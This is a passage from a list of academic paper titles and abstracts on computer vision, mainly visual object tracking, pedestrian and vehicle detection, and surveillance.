in reproducing many of the proposed methods, which makes it difficult to compare the approaches. As a result, surveying the literature by enumerating the proposals one--after-another is not the most useful way to provide a comparative point of view. Accordingly, we present a more convenient strategy to survey the different approaches. We divide the problem of detecting pedestrians from images into different processing steps, each with attached responsibilities. Then, the different proposed methods are analyzed and classified with respect to each processing stage, favoring a comparative viewpoint. Finally, discussion of the important topics is presented, putting special emphasis on the future needs and challenges. --- paper_title: Research on Intelligent Visual Surveillance for Public Security paper_content: Intelligent visual surveillance plays an important role in the assurance of the public security, it is different from traditional passive video surveillance, it transforms the computer role from "Looking at People" to "Understanding People". In the paper, we review advances in intelligent visual surveillance, and present some future research directions. --- paper_title: On-road vehicle detection: a review paper_content: Developing on-board automotive driver assistance systems aiming to alert drivers about driving environments, and possible collision with other vehicles has attracted a lot of attention lately. In these systems, robust and reliable vehicle detection is a critical step. This paper presents a review of recent vision-based on-road vehicle detection systems. Our focus is on systems where the camera is mounted on the vehicle rather than being fixed such as in traffic/driveway monitoring systems. First, we discuss the problem of on-road vehicle detection using optical sensors followed by a brief review of intelligent vehicle research worldwide. Then, we discuss active and passive sensors to set the stage for vision-based vehicle detection. Methods aiming to quickly hypothesize the location of vehicles in an image as well as to verify the hypothesized locations are reviewed next. Integrating detection with tracking is also reviewed to illustrate the benefits of exploiting temporal continuity for vehicle detection. Finally, we present a critical overview of the methods discussed, we assess their potential for future deployment, and we present directions for future research. --- paper_title: Understanding Transit Scenes: A Survey on Human Behavior-Recognition Algorithms paper_content: Visual surveillance is an active research topic in image processing. Transit systems are actively seeking new or improved ways to use technology to deter and respond to accidents, crime, suspicious activities, terrorism, and vandalism. Human behavior-recognition algorithms can be used proactively for prevention of incidents or reactively for investigation after the fact. This paper describes the current state-of-the-art image-processing methods for automatic-behavior-recognition techniques, with focus on the surveillance of human activities in the context of transit applications. The main goal of this survey is to provide researchers in the field with a summary of progress achieved to date and to help identify areas where further research is needed. This paper provides a thorough description of the research on relevant human behavior-recognition methods for transit surveillance. Recognition methods include single person (e.g., loitering), multiple-person interactions (e.g., fighting and personal attacks), person-vehicle interactions (e.g., vehicle vandalism), and person-facility/location interactions (e.g., object left behind and trespassing). A list of relevant behavior-recognition papers is presented, including behaviors, data sets, implementation details, and results. In addition, algorithm's weaknesses, potential research directions, and contrast with commercial capabilities as advertised by manufacturers are discussed. This paper also provides a summary of literature surveys and developments of the core technologies (i.e., low-level processing techniques) used in visual surveillance systems, including motion detection, classification of moving objects, and tracking. --- paper_title: Object tracking: A survey paper_content: The goal of this article is to review the state-of-the-art tracking methods, classify them into different categories, and identify new trends. Object tracking, in general, is a challenging problem. Difficulties in tracking objects can arise due to abrupt object motion, changing appearance patterns of both the object and the scene, nonrigid object structures, object-to-object and object-to-scene occlusions, and camera motion. Tracking is usually performed in the context of higher-level applications that require the location and/or shape of the object in every frame. Typically, assumptions are made to constrain the tracking problem in the context of a particular application. In this survey, we categorize the tracking methods on the basis of the object and motion representations used, provide detailed descriptions of representative methods in each category, and examine their pros and cons. Moreover, we discuss the important issues related to tracking including the use of appropriate image features, selection of motion models, and detection of objects. --- paper_title: D.: Computational Studies of Human Motion: Part 1, Tracking and Motion Synthesis paper_content: We review methods for kinematic tracking of the human body in video. The review is part of a projected book that is intended to cross-fertilize ideas about motion representation between the animation and computer vision communities. The review confines itself to the earlier stages of motion, focusing on tracking and motion synthesis; future material will cover activity representation and motion generation. --- paper_title: A Review of Visual Tracking paper_content: This report contains a review of visual tracking in monocular video sequences. For the purpose of this review, the majority of the visual trackers in the literature are divided into three tracking categories: discrete feature trackers, contour trackers, and region-based trackers. This categorization was performed based on the features used and the algorithms employed by the various visual trackers. The first class of trackers represents targets as discrete features (e.g. points, sets of points, lines) and performs data association using a distance metric that accommodates the particular feature. Contour trackers provide precise outlines of the target boundaries, meaning that they must not only uncover the position of the target, but its shape as well. Contour trackers often make use of gradient edge information during the tracking process. Region trackers represent the target with area-based descriptors that define its support and attempt to locate the image region in the current frame that best matches an object template. Trackers that are not in agreement with the abovementioned categorization, including those that combine methods from the three defined classes, are also considered in this review. In addition to categorizing and describing the various visual trackers in the literature, this review also provides a commentary on the current state of the field as well as a comparative analysis of the various approaches. The paper concludes with an outline of open problems in visual tracking. --- paper_title: Increasing the discrimination power of the co-occurrence matrix-based features paper_content: This paper is concerned with an approach to exploiting information available from the co-occurrence matrices computed for different distance parameter values. A polynomial of degree n is fitted to each of 14 Haralick's coefficients computed from the average co-occurrence matrices evaluated for several distance parameter values. Parameters of the polynomials constitute a set of new features. The experimental investigations performed substantiated the usefulness of the approach. --- paper_title: Sigma Set Based Implicit Online Learning for Object Tracking paper_content: This letter presents a novel object tracking approach within the Bayesian inference framework through implicit online learning. In our approach, the target is represented by multiple patches, each of which is encoded by a powerful and efficient region descriptor called Sigma set. To model each target patch, we propose to utilize the online one-class support vector machine algorithm, named Implicit online Learning with Kernels Model (ILKM). ILKM is simple, efficient, and capable of learning a robust online target predictor in the presence of appearance changes. Responses of ILKMs related to multiple target patches are fused by an arbitrator with an inference of possible partial occlusions, to make the decision and trigger the model update. Experimental results demonstrate that the proposed tracking approach is effective and efficient in ever-changing and cluttered scenes. --- paper_title: A novel supervised level set method for non-rigid object tracking paper_content: We present a novel approach to non-rigid object tracking based on a supervised level set model (SLSM). In contrast with conventional level set models, which emphasize the intensity consistency only and consider no priors, the curve evolution of the proposed SLSM is object-oriented and supervised by the specific knowledge of the target we want to track. Therefore, the SLSM can ensure a more accurate convergence to the target in tracking applications. In particular, we firstly construct the appearance model for the target in an on-line boosting manner due to its strong discriminative power between objects and background. Then the probability of the contour is modeled by considering both the region and edge cues in a Bayesian manner, leading the curve converge to the candidate region with maximum likelihood of being the target. Finally, accurate target region qualifies the samples fed the boosting procedure as well as the target model prepared for the next time step. Positive decrease rate is used to adjust the learning pace over time, enabling tracking to continue under partial and total occlusion. Experimental results on a number of challenging sequences validate the effectiveness of the technique. --- paper_title: Point matching under large image deformations and illumination changes paper_content: To solve the general point correspondence problem in which the underlying transformation between image patches is represented by a homography, a solution based on extensive use of first order differential techniques is proposed. We integrate in a single robust M-estimation framework the traditional optical flow method and matching of local color distributions. These distributions are computed with spatially oriented kernels in the 5D joint spatial/color space. The estimation process is initiated at the third level of a Gaussian pyramid, uses only local information, and the illumination changes between the two images are also taken into account. Subpixel matching accuracy is achieved under large projective distortions significantly exceeding the performance of any of the two components alone. As an application, the correspondence algorithm is employed in oriented tracking of objects. --- paper_title: Efficient mean-shift tracking via a new similarity measure paper_content: The mean shift algorithm has achieved considerable success in object tracking due to its simplicity and robustness. It finds local minima of a similarity measure between the color histograms or kernel density estimates of the model and target image. The most typically used similarity measures are the Bhattacharyya coefficient or the Kullback-Leibler divergence. In practice, these approaches face three difficulties. First, the spatial information of the target is lost when the color histogram is employed, which precludes the application of more elaborate motion models. Second, the classical similarity measures are not very discriminative. Third, the sample-based classical similarity measures require a calculation that is quadratic in the number of samples, making real-time performance difficult. To deal with these difficulties we propose a new, simple-to-compute and more discriminative similarity measure in spatial-feature spaces. The new similarity measure allows the mean shift algorithm to track more general motion models in an integrated way. To reduce the complexity of the computation to linear order we employ the recently proposed improved fast Gauss transform. This leads to a very efficient and robust nonparametric spatial-feature tracking algorithm. The algorithm is tested on several image sequences and shown to achieve robust and reliable frame-rate tracking. --- paper_title: Online visual tracking with histograms and articulating blocks paper_content: We propose an algorithm for accurate tracking of articulated objects using online update of appearance and shape. The challenge here is to model foreground appearance with histograms in a way that is both efficient and accurate. In this algorithm, the constantly changing foreground shape is modeled as a small number of rectangular blocks, whose positions within the tracking window are adaptively determined. Under the general assumption of stationary foreground appearance, we show that robust object tracking is possible by adaptively adjusting the locations of these blocks. Implemented in MATLAB without substantial optimization, our tracker runs already at 3.7 frames per second on a 3GHz machine. Experimental results have demonstrated that the algorithm is able to efficiently track articulated objects undergoing large variation in appearance and shape. --- paper_title: Finding Trajectories of Feature Points in a Monocular Image Sequence paper_content: Identifying the same physical point in more than one image, the correspondence problem, is vital in motion analysis. Most research for establishing correspondence uses only two frames of a sequence to solve this problem. By using a sequence of frames, it is possible to exploit the fact that due to inertia the motion of an object cannot change instantaneously. By using smoothness of motion, it is possible to solve the correspondence problem for arbitrary motion of several nonrigid objects in a scene. We formulate the correspondence problem as an optimization problem and propose an iterative algorithm to find trajectories of points in a monocular image sequence. A modified form of this algorithm is useful in case of occlusion also. We demonstrate the efficacy of this approach considering synthetic, laboratory, and real scenes. --- paper_title: Region Covariance : A Fast Descriptor for Detection and Classification paper_content: We describe a new region descriptor and apply it to two problems, object detection and texture classification. The covariance of d-features, e.g., the three-dimensional color vector, the norm of first and second derivatives of intensity with respect to x and y, etc., characterizes a region of interest. We describe a fast method for computation of covariances based on integral images. The idea presented here is more general than the image sums or histograms, which were already published before, and with a series of integral images the covariances are obtained by a few arithmetic operations. Covariance matrices do not lie on Euclidean space, therefore we use a distance metric involving generalized eigenvalues which also follows from the Lie group structure of positive definite matrices. Feature matching is a simple nearest neighbor search under the distance metric and performed extremely rapidly using the integral images. The performance of the covariance features is superior to other methods, as it is shown, and large rotations and illumination changes are also absorbed by the covariance matrix. --- paper_title: Covariance Tracking using Model Update Based on Lie Algebra paper_content: We propose a simple and elegant algorithm to track nonrigid objects using a covariance based object description and a Lie algebra based update mechanism. We represent an object window as the covariance matrix of features, therefore we manage to capture the spatial and statistical properties as well as their correlation within the same representation. The covariance matrix enables efficient fusion of different types of features and modalities, and its dimensionality is small. We incorporated a model update algorithm using the Lie group structure of the positive definite matrices. The update mechanism effectively adapts to the undergoing object deformations and appearance changes. The covariance tracking method does not make any assumption on the measurement noise and the motion of the tracked objects, and provides the global optimal solution. We show that it is capable of accurately detecting the nonrigid, moving objects in non-stationary camera sequences while achieving a promising detection rate of 97.4 percent. --- paper_title: Integrating Color and Shape-Texture Features for Adaptive Real-Time Object Tracking paper_content: We extend the standard mean-shift tracking algorithm to an adaptive tracker by selecting reliable features from color and shape-texture cues according to their descriptive ability. The target model is updated according to the similarity between the initial and current models, and this makes the tracker more robust. The proposed algorithm has been compared with other trackers using challenging image sequences, and it provides better performance. --- paper_title: Multi-frame optical flow estimation using subspace constraints paper_content: Shows that the set of all flow fields in a sequence of frames imaging a rigid scene resides in a low-dimensional linear subspace. Based on this observation, we develop a method for simultaneous estimation of optical flow across multiple frames, which uses these subspace constraints. The multi-frame subspace constraints are strong constraints, and they replace commonly used heuristic constraints, such as spatial or temporal smoothness. The subspace constraints are geometrically meaningful and are not violated at depth discontinuities or when the camera motion changes abruptly. Furthermore, we show that the subspace constraints on flow fields apply for a variety of imaging models, scene models and motion models. Hence, the presented approach for constrained multi-frame flow estimation is general. However, our approach does not require prior knowledge of the underlying world or camera model. Although linear subspace constraints have been used successfully in the past for recovering 3D information, it has been assumed that 2D correspondences are given. However, correspondence estimation is a fundamental problem in motion analysis. In this paper, we use multi-frame subspace constraints to constrain the 2D correspondence estimation process itself, and not for 3D recovery. --- paper_title: Feature point correspondence in the presence of occlusion paper_content: Occlusion and poor feature point detection are two of the main difficulties in the use of multiple frames for establishing correspondence of feature points. A formulation of the correspondence problem as an optimization problem is used to handle these difficulties. Modifications to an existing iterative optimization procedure for solving the formulation of the correspondence problem are discussed. Experimental results are presented to show the merits of the formulation. > --- paper_title: A Three Frame Algorithm for Estimating Two-Component Image Motion paper_content: A fundamental assumption made in formulating optical-flow algorithms, that motion at any point in an image can be represented as a single pattern component undergoing a simple translation, fails for a number of situations that commonly occur in real-world images. An alternative formulation of the local motion assumption in which there may be two distinct patterns undergoing coherent (e.g. affine) motion within a given local analysis region is proposed. An algorithm for the analysis of two-component motion in which tracking and nulling mechanisms applied to three consecutive image frames separate and estimate the individual components is given. Precise results are obtained, even for components that differ only slightly in velocity as well as for a faint component in the presence of a dominant, masking component. The algorithm provides precise motion estimates for a set of elementary two-motion configurations and is robust in the presence of noise. > --- paper_title: Integral histogram: a fast way to extract histograms in Cartesian spaces paper_content: We present a novel method, which we refer as an integral histogram, to compute the histograms of all possible target regions in a Cartesian data space. Our method has three distinct advantages: 1) It is computationally superior to the conventional approach. The integral histogram method makes it possible to employ even an exhaustive search process in real-time, which was impractical before. 2) It can be extended to higher data dimensions, uniform and nonuniform bin formations, and multiple target scales without sacrificing its computational advantages. 3) It enables the description of higher level histogram features. We exploit the spatial arrangement of data points, and recursively propagate an aggregated histogram by starting from the origin and traversing through the remaining points along either a scan-line or a wave-front. At each step, we update a single bin using the values of integral histogram at the previously visited neighboring data points. After the integral histogram is propagated, histogram of any target region can be computed easily by using simple arithmetic operations. --- paper_title: Incremental learning of weighted tensor subspace for visual tracking paper_content: Tensor analysis has been widely utilized in image-related machine learning applications, which has preferable performance over the vector-based approaches for its capability of holding the spatial structure information in some research field. The traditional tensor representation only includes the intensity values, which is sensitive to illumination variation. For this purpose, a weighted tensor subspace (WTS) is defined as object descriptor by combining the Retinex image with the original image. Then, an incremental learning algorithm is developed for WTS to adapt to the appearance change during the tracking. The proposed method could learn the lightness changing incrementally and get robust tracking performance under various luminance conditions. The experimental results illustrate the effectiveness of the proposed visual tracking Scheme. --- paper_title: Textural Features for Image Classification paper_content: Texture is one of the important characteristics used in identifying objects or regions of interest in an image, whether the image be a photomicrograph, an aerial photograph, or a satellite image. This paper describes some easily computable textural features based on gray-tone spatial dependancies, and illustrates their application in category-identification tasks of three different kinds of image data: photomicrographs of five kinds of sandstones, 1:20 000 panchromatic aerial photographs of eight land-use categories, and Earth Resources Technology Satellite (ERTS) multispecial imagery containing seven land-use categories. We use two kinds of decision rules: one for which the decision regions are convex polyhedra (a piecewise linear decision rule), and one for which the decision regions are rectangular parallelpipeds (a min-max decision rule). In each experiment the data set was divided into two parts, a training set and a test set. Test set identification accuracy is 89 percent for the photomicrographs, 82 percent for the aerial photographic imagery, and 83 percent for the satellite imagery. These results indicate that the easily computable textural features probably have a general applicability for a wide variety of image-classification applications. --- paper_title: Real-time Visual Tracking under Arbitrary Illumination Changes paper_content: In this paper, we investigate how to improve the robustness of visual tracking methods with respect to generic lighting changes. We propose a new approach to the direct image alignment of either Lambertian or non-Lambertian objects under shadows, inter-reflections, glints as well as ambient, diffuse and specular reflections which may vary in power, type, number and space. The method is based on a proposed model of illumination changes together with an appropriate geometric model of image motion. The parameters related to these models are obtained through an efficient second-order optimization technique which minimizes directly the intensity discrepancies. Comparison results with existing direct methods show significant improvements in the tracking performance. Extensive experiments confirm the robustness and reliability of our method. --- paper_title: GEOMETRIC MEANS IN A NOVEL VECTOR SPACE STRUCTURE ON SYMMETRIC POSITIVE-DEFINITE paper_content: In this work we present a new generalization of the geometric mean of positive numbers on symmetric positive‐definite matrices, called Log‐Euclidean. The approach is based on two novel algebraic structures on symmetric positive‐definite matrices: first, a lie group structure which is compatible with the usual algebraic properties of this matrix space; second, a new scalar multiplication that smoothly extends the Lie group structure into a vector space structure. From bi‐invariant metrics on the Lie group structure, we define the Log‐Euclidean mean from a Riemannian point of view. This notion coincides with the usual Euclidean mean associated with the novel vector space structure. Furthermore, this means corresponds to an arithmetic mean in the domain of matrix logarithms. We detail the invariance properties of this novel geometric mean and compare it to the recently introduced affine‐invariant mean. The two means have the same determinant and are equal in a number of cases, yet they are not identical in g... --- paper_title: Visual tracking using learned linear subspaces paper_content: This paper presents a simple but robust visual tracking algorithm based on representing the appearances of objects using affine warps of learned linear subspaces of the image space. The tracker adaptively updates this subspace while tracking by finding a linear subspace that best approximates the observations made in the previous frames. Instead of the traditional L/sup 2/-reconstruction error norm which leads to subspace estimation using PCA or SVD, we argue that a variant of it, the uniform L/sup 2/-reconstruction error norm, is the right one for tracking. Under this framework we provide a simple and a computationally inexpensive algorithm for finding a subspace whose uniform L/sup 2/-reconstruction error norm for a given collection of data samples is below some threshold, and a simple tracking algorithm is an immediate consequence. We show experimental results on a variety of image sequences of people and man-made objects moving under challenging imaging conditions, which include drastic illumination variation, partial occlusion and extreme pose variation. --- paper_title: Dynamical statistical shape priors for level set-based tracking paper_content: In recent years, researchers have proposed introducing statistical shape knowledge into level set-based segmentation methods in order to cope with insufficient low-level information. While these priors were shown to drastically improve the segmentation of familiar objects, so far the focus has been on statistical shape priors which are static in time. Yet, in the context of tracking deformable objects, it is clear that certain silhouettes (such as those of a walking person) may become more or less likely over time. In this paper, we tackle the challenge of learning dynamical statistical models for implicitly represented shapes. We show how these can be integrated as dynamical shape priors in a Bayesian framework for level set-based image sequence segmentation. We assess the effect of such shape priors "with memory" on the tracking of familiar deformable objects in the presence of noise and occlusion. We show comparisons between dynamical and static shape priors, between models of pure deformation and joint models of deformation and transformation, and we quantitatively evaluate the segmentation accuracy as a function of the noise level and of the camera frame rate. Our experiments demonstrate that level set-based segmentation and tracking can be strongly improved by exploiting the temporal correlations among consecutive silhouettes which characterize deforming shapes --- paper_title: PROST: Parallel robust online simple tracking paper_content: Tracking-by-detection is increasingly popular in order to tackle the visual tracking problem. Existing adaptive methods suffer from the drifting problem, since they rely on self-updates of an on-line learning method. In contrast to previous work that tackled this problem by employing semi-supervised or multiple-instance learning, we show that augmenting an on-line learning method with complementary tracking approaches can lead to more stable results. In particular, we use a simple template model as a non-adaptive and thus stable component, a novel optical-flow-based mean-shift tracker as highly adaptive element and an on-line random forest as moderately adaptive appearance-based learner. We combine these three trackers in a cascade. All of our components run on GPUs or similar multi-core systems, which allows for real-time performance. We show the superiority of our system over current state-of-the-art tracking methods in several experiments on publicly available data. --- paper_title: Contextual flow paper_content: Matching based on local brightness is quite limited, because small changes on local appearance invalidate the constancy in brightness. The root of this limitation is its treatment regardless of the information from the spatial contexts. This papers leaps from brightness constancy to context constancy, and thus from optical flow to contextual flow. It presents a new approach that incorporates contexts to constrain motion estimation for target tracking. In this approach, one individual spatial context of a given pixel is represented by the posterior density of the associated feature class in its contextual domain. Each individual context gives a linear contextual flow constraint to the motion, so that the motion can be estimated in an over-determined contextual system. Based on this contextual flow model, this paper presents a new and powerful target tracking method that integrates the processes of salient contextual point selection, robust contextual matching, and dynamic context selection. Extensive experiment results show the effectiveness of the proposed approach. --- paper_title: Robust visual tracking based on simplified biologically inspired features paper_content: We address the problem of robust appearance-based visual tracking. First, a set of simplified biologically inspired features (SBIF) is proposed for object representation and the Bhattacharyya coefficient is used to measure the similarity between the target model and candidate targets. Then, the proposed appearance model is combined into a Bayesian state inference tracking framework utilizing the SIR (sampling importance resampling) particle filter to propagate sample distributions over time. Numerous experiments are conducted and experimental results demonstrate that our algorithm is robust to partial occlusions and variations of illumination and pose, resistent to nearby distractors, as well as possesses the state-of-the-art tracking accuracy. --- paper_title: Region covariance matrix-based object tracking with occlusions handling paper_content: This work proposes an optical-flow based feature tracking that is combined with region covariance matrix for dealing with tracking of an object undergoing considerable occlusions. The object is tracked using a set of key-points. The key-points are tracked via a computationally inexpensive optical flow algorithm. If the occlusion of the feature is detected the algorithm calculates the covariance matrix inside a region, which is located at the feature's position just before the occlusion. The region covariance matrix is then used to detect the ending of the feature occlusion. This is achieved via comparing the covariance matrix based similarity measures in some window surrounding the occluded key-point. The outliers that arise in the optical flow at the boundary of the objects are excluded using RANSAC and affine transformation. Experimental results that were obtained on freely available image sequences show the feasibility of our approach to perform tracking of objects undergoing considerable occlusions. The resulting algorithm can cope with occlusions of faces as well as objects of similar colors and shapes. --- paper_title: Determining Optical Flow paper_content: Optical flow cannot be computed locally, since only one independent measurement is available from the image sequence at a point, while the flow velocity has two components. A second constraint is needed. A method for finding the optical flow pattern is presented which assumes that the apparent velocity of the brightness pattern varies smoothly almost everywhere in the image. An iterative implementation is shown which successfully computes the optical flow for a number of synthetic image sequences. The algorithm is robust in that it can handle image sequences that are quantified rather coarsely in space and time. It is also insensitive to quantization of brightness levels and additive noise. Examples are included where the assumption of smoothness is violated at singular points or along lines in the image. --- paper_title: Differential Earth Mover's Distance with Its Applications to Visual Tracking paper_content: The Earth mover's distance (EMD) is a similarity measure that captures perceptual difference between two distributions. Its computational complexity, however, prevents a direct use in many applications. This paper proposes a novel differential EMD (DEMD) algorithm based on the sensitivity analysis of the simplex method and offers a speedup at orders of magnitude compared with its brute-force counterparts. The DEMD algorithm is discussed and empirically verified in the visual tracking context. The deformations of the distributions for objects at different time instances are accommodated well by the EMD, and the differential algorithm makes the use of EMD in real-time tracking possible. To further reduce the computation, signatures, i.e., variable-size descriptions of distributions, are employed as an object representation. The new algorithm models and estimates local background scenes as well as foreground objects to handle scale changes in a principled way. Extensive quantitative evaluation of the proposed algorithm has been carried out using benchmark sequences and the improvement over the standard mean shift tracker is demonstrated. --- paper_title: Incremental Learning for Robust Visual Tracking paper_content: Visual tracking, in essence, deals with non-stationary image streams that change over time. While most existing algorithms are able to track objects well in controlled environments, they usually fail in the presence of significant variation of the object's appearance or surrounding illumination. One reason for such failures is that many algorithms employ fixed appearance models of the target. Such models are trained using only appearance data available before tracking begins, which in practice limits the range of appearances that are modeled, and ignores the large volume of information (such as shape changes or specific lighting conditions) that becomes available during tracking. In this paper, we present a tracking method that incrementally learns a low-dimensional subspace representation, efficiently adapting online to changes in the appearance of the target. The model update, based on incremental algorithms for principal component analysis, includes two important features: a method for correctly updating the sample mean, and a forgetting factor to ensure less modeling power is expended fitting older observations. Both of these features contribute measurably to improving overall tracking performance. Numerous experiments demonstrate the effectiveness of the proposed tracking algorithm in indoor and outdoor environments where the target objects undergo large changes in pose, scale, and illumination. --- paper_title: Robust Fragments-based Tracking using the Integral Histogram paper_content: We present a novel algorithm (which we call "Frag- Track") for tracking an object in a video sequence. The template object is represented by multiple image fragments or patches. The patches are arbitrary and are not based on an object model (in contrast with traditional use of modelbased parts e.g. limbs and torso in human tracking). Every patch votes on the possible positions and scales of the object in the current frame, by comparing its histogram with the corresponding image patch histogram. We then minimize a robust statistic in order to combine the vote maps of the multiple patches. A key tool enabling the application of our algorithm to tracking is the integral histogram data structure [18]. Its use allows to extract histograms of multiple rectangular regions in the image in a very efficient manner. Our algorithm overcomes several difficulties which cannot be handled by traditional histogram-based algorithms [8, 6]. First, by robustly combining multiple patch votes, we are able to handle partial occlusions or pose change. Second, the geometric relations between the template patches allow us to take into account the spatial distribution of the pixel intensities - information which is lost in traditional histogram-based algorithms. Third, as noted by [18], tracking large targets has the same computational cost as tracking small targets. We present extensive experimental results on challenging sequences, which demonstrate the robust tracking achieved by our algorithm (even with the use of only gray-scale (noncolor) information). --- paper_title: Single and Multiple Object Tracking Using Log-Euclidean Riemannian Subspace and Block-Division Appearance Model paper_content: Object appearance modeling is crucial for tracking objects, especially in videos captured by nonstationary cameras and for reasoning about occlusions between multiple moving objects. Based on the log-euclidean Riemannian metric on symmetric positive definite matrices, we propose an incremental log-euclidean Riemannian subspace learning algorithm in which covariance matrices of image features are mapped into a vector space with the log-euclidean Riemannian metric. Based on the subspace learning algorithm, we develop a log-euclidean block-division appearance model which captures both the global and local spatial layout information about object appearances. Single object tracking and multi-object tracking with occlusion reasoning are then achieved by particle filtering-based Bayesian state inference. During tracking, incremental updating of the log-euclidean block-division appearance model captures changes in object appearance. For multi-object tracking, the appearance models of the objects can be updated even in the presence of occlusions. Experimental results demonstrate that the proposed tracking algorithm obtains more accurate results than six state-of-the-art tracking algorithms. --- paper_title: Object tracking using the Gabor wavelet transform and the golden section algorithm paper_content: This paper presents a new method for tracking an object in a video sequence which uses a 2D Gabor wavelet transform (GWT), a 2D mesh, and a 2D golden section algorithm. An object is modeled by local features from a number of the selected feature points, and the global placement of these feature points. The feature points are stochastically selected based on the energy of their GWT coefficients. Points with higher energy have a higher probability of being selected. The amplitudes of the GWT coefficients of a feature point are then used as the local feature. The global placement of the feature points is determined by a 2D mesh whose feature is the area of the triangles formed by the feature points. The overall similarity between two objects is a weighted sum of the local and global similarities. In order to find the corresponding object in the video sequence, the 2D golden section algorithm is employed, and this can be shown to be the fastest algorithm to find the maximum of a unimodal function. Our results show that the method is robust to object deformation and supports object tracking in noisy video sequences. --- paper_title: Efficient Region Tracking With Parametric Models of Geometry and Illumination paper_content: As an object moves through the field of view of a camera, the images of the object may change dramatically. This is not simply due to the translation of the object across the image plane; complications arise due to the fact that the object undergoes changes in pose relative to the viewing camera, in illumination relative to light sources, and may even become partially or fully occluded. We develop an efficient general framework for object tracking, which addresses each of these complications. We first develop a computationally efficient method for handling the geometric distortions produced by changes in pose. We then combine geometry and illumination into an algorithm that tracks large image regions using no more computation than would be required to track with no accommodation for illumination changes. Finally, we augment these methods with techniques from robust statistics and treat occluded regions on the object as statistical outliers. Experimental results are given to demonstrate the effectiveness of our methods. --- paper_title: Detection and tracking of shopping groups in stores paper_content: We describe a monocular real-time computer vision system that identifies shopping groups by detecting and tracking multiple people as they wait in a checkout line or service counter. Our system segments each frame into foreground regions which contains multiple people. Foreground regions are further segmented into individuals using a temporal segmentation of foreground and motion cues. Once a person is detected, an appearance model based on color and edge density in conjunction with a mean-shift tracker is used to recover the person's trajectory. People are grouped together as a shopping group by analyzing interbody distances. The system also monitors the cashier's activities to determine when shopping transactions start and end. Experimental results demonstrate the robustness and real-time performance of the algorithm. --- paper_title: Object of Interest segmentation and Tracking by Using Feature Selection and Active Contours paper_content: Most image segmentation algorithms in the past are based on optimizing an objective function that aims to achieve the similarity between several low-level features to build a partition of the image into homogeneous regions. In the present paper, we propose to incorporate the relevance (selection) of the grouping features to enforce the segmentation toward the capturing of objects of interest. The relevance of the features is determined through a set of positive and negative examples of a specific object defined a priori by the user. The calculation of the relevance of the features is performed by maximizing an objective function defined on the mixture likelihoods of the positive and negative object examples sets. The incorporation of the features relevance in the object segmentation is formulated through an energy functional which is minimized by using level set active contours. We show the efficiency of the approach on several examples of object of interest segmentation and tracking where the features relevance is used. --- paper_title: On incremental and robust subspace learning paper_content: Principal Component Analysis (PCA) has been of great interest in computer vision and pattern recognition. In particular, incrementally learning a PCA model, which is computationally efficient for large-scale problems as well as adaptable to reflect the variable state of a dynamic system, is an attractive research topic with numerous applications such as adaptive background modelling and active object recognition. In addition, the conventional PCA, in the sense of least mean squared error minimisation, is susceptible to outlying measurements. To address these two important issues, we present a novel algorithm of incremental PCA, and then extend it to robust PCA. Compared with the previous studies on robust PCA, our algorithm is computationally more efficient. We demonstrate the performance of these algorithms with experimental results on dynamic background modelling and multi-view face modelling. --- paper_title: Incremental Tensor Subspace Learning and Its Applications to Foreground Segmentation and Tracking paper_content: Appearance modeling is very important for background modeling and object tracking. Subspace learning-based algorithms have been used to model the appearances of objects or scenes. Current vector subspace-based algorithms cannot effectively represent spatial correlations between pixel values. Current tensor subspace-based algorithms construct an offline representation of image ensembles, and current online tensor subspace learning algorithms cannot be applied to background modeling and object tracking. In this paper, we propose an online tensor subspace learning algorithm which models appearance changes by incrementally learning a tensor subspace representation through adaptively updating the sample mean and an eigenbasis for each unfolding matrix of the tensor. The proposed incremental tensor subspace learning algorithm is applied to foreground segmentation and object tracking for grayscale and color image sequences. The new background models capture the intrinsic spatiotemporal characteristics of scenes. The new tracking algorithm captures the appearance characteristics of an object during tracking and uses a particle filter to estimate the optimal object state. Experimental evaluations against state-of-the-art algorithms demonstrate the promise and effectiveness of the proposed incremental tensor subspace learning algorithm, and its applications to foreground segmentation and object tracking. --- paper_title: Gradient Feature Selection for Online Boosting paper_content: Boosting has been widely applied in computer vision, especially after Viola and Jones's seminal work. The marriage of rectangular features and integral-image- enabled fast computation makes boosting attractive for many vision applications. However, this popular way of applying boosting normally employs an exhaustive feature selection scheme from a very large hypothesis pool, which results in a less-efficient learning process. Furthermore, this poses additional constraint on applying boosting in an onine fashion, where feature re-selection is often necessary because of varying data characteristic, but yet impractical due to the huge hypothesis pool. This paper proposes a gradient-based feature selection approach. Assuming a generally trained feature set and labeled samples are given, our approach iteratively updates each feature using the gradient descent, by minimizing the weighted least square error between the estimated feature response and the true label. In addition, we integrate the gradient-based feature selection with an online boosting framework. This new online boosting algorithm not only provides an efficient way of updating the discriminative feature set, but also presents a unified objective for both feature selection and weak classifier updating. Experiments on the person detection and tracking applications demonstrate the effectiveness of our proposal. --- paper_title: Boosting adaptive linear weak classifiers for online learning and tracking paper_content: Online boosting methods have recently been used successfully for tracking, background subtraction etc. Conventional online boosting algorithms emphasize on interchanging new weak classifiers/features to adapt with the change over time. We are proposing a new online boosting algorithm where the form of the weak classifiers themselves are modified to cope with scene changes. Instead of replacement, the parameters of the weak classifiers are altered in accordance with the new data subset presented to the online boosting process at each time step. Thus we may avoid altogether the issue of how many weak classifiers to be replaced to capture the change in the data or which efficient search algorithm to use for a fast retrieval of weak classifiers. A computationally efficient method has been used in this paper for the adaptation of linear weak classifiers. The proposed algorithm has been implemented to be used both as an online learning and a tracking method. We show quantitative and qualitative results on both UCI datasets and several video sequences to demonstrate improved performance of our algorithm. --- paper_title: Tracking as Repeated Figure/Ground Segmentation paper_content: Tracking over a long period of time is challenging as the appearance, shape and scale of the object in question may vary. We propose a paradigm of tracking by repeatedly segmenting figure from background. Accurate spatial support obtained in segmentation provides rich information about the track and enables reliable tracking of non-rigid objects without drifting. Figure/ground segmentation operates sequentially in each frame by utilizing both static image cues and temporal coherence cues, which include an appearance model of brightness (or color) and a spatial model propagating figure/ground masks through low-level region correspondence. A superpixel-based conditional random field linearly combines cues and loopy belief propagation is used to estimate marginal posteriors of figure vs background. We demonstrate our approach on long sequences of sports video, including figure skating and football. --- paper_title: Surf: Speeded up robust features paper_content: In this paper, we present a novel scale- and rotation-invariant interest point detector and descriptor, coined SURF (Speeded Up Robust Features). It approximates or even outperforms previously proposed schemes with respect to repeatability, distinctiveness, and robustness, yet can be computed and compared much faster. ::: ::: This is achieved by relying on integral images for image convolutions; by building on the strengths of the leading existing detectors and descriptors (in casu, using a Hessian matrix-based measure for the detector, and a distribution-based descriptor); and by simplifying these methods to the essential. This leads to a combination of novel detection, description, and matching steps. The paper presents experimental results on a standard 